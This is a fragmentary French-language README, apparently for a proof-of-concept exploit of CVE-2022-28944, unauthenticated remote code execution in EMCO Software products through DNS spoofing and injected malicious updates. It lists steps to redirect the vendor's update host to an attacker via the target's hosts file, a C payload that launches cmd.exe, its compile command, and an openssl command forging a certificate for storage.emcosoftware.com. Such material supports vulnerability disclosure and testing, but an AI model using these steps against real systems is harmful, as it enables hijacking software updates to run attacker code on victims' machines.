
Exploit de preuve de concept pour l'exécution de code à distance non authentifiée dans les produits EMCO Software via l'usurpation DNS et l'injection de mises à jour malveillantes.
Vulnérabilité d'exécution de code à distance par mise à jour non authentifiée dans plusieurs produits EMCO Software.
Utilisation : python3 cve-2022-28944_poc.py
Détails dans le rapport sur gerr.re.
storage.emcosoftware.com vers l'adresse IP de l'attaquant ;
c:\windows\system32\drivers\etc\hosts sur la cible.
proof.c sur l'attaquant, par exemple avec i686-w64-mingw32-gcc proof.c -o proof.exe ;#include <windows.h>
int main(int argc, char const *argv[]){
WinExec("cmd.exe",1);
return TRUE;
}
openssl req -new -x509 -keyout storage.emcosoftware.com.pem -out storage.emcosoftware.com.pem -days 365 -nodes -subj "/CN=storage.emcosoftware.com"